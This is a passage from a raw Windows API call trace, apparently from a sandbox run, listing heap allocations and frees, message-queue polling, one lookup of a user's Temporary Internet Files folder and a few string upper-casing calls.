hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0251.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0251.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0251.231] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.231] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0251.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0251.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0251.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0251.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0251.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0251.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0251.233] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0251.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0251.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0251.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0251.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0251.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0251.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0251.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0251.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0251.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0251.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0251.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0251.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0251.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0251.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0251.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0251.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0251.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0251.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0251.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0251.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0251.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0251.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0251.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0251.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0251.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0251.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0251.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0251.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0251.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0251.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0251.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0251.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.235] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0251.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0251.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0251.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0251.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0251.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0251.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0251.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.236] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0251.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0251.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0251.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.237] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Temporary Internet Files", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xac89, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0xaa5760 [0251.238] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0251.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0251.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.239] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0251.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0251.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0251.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.240] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.240] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0251.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab68 [0251.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.241] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0251.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.241] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0251.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0251.242] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.242] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.242] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0251.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0251.242] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0251.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.243] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0251.244] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.244] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.244] 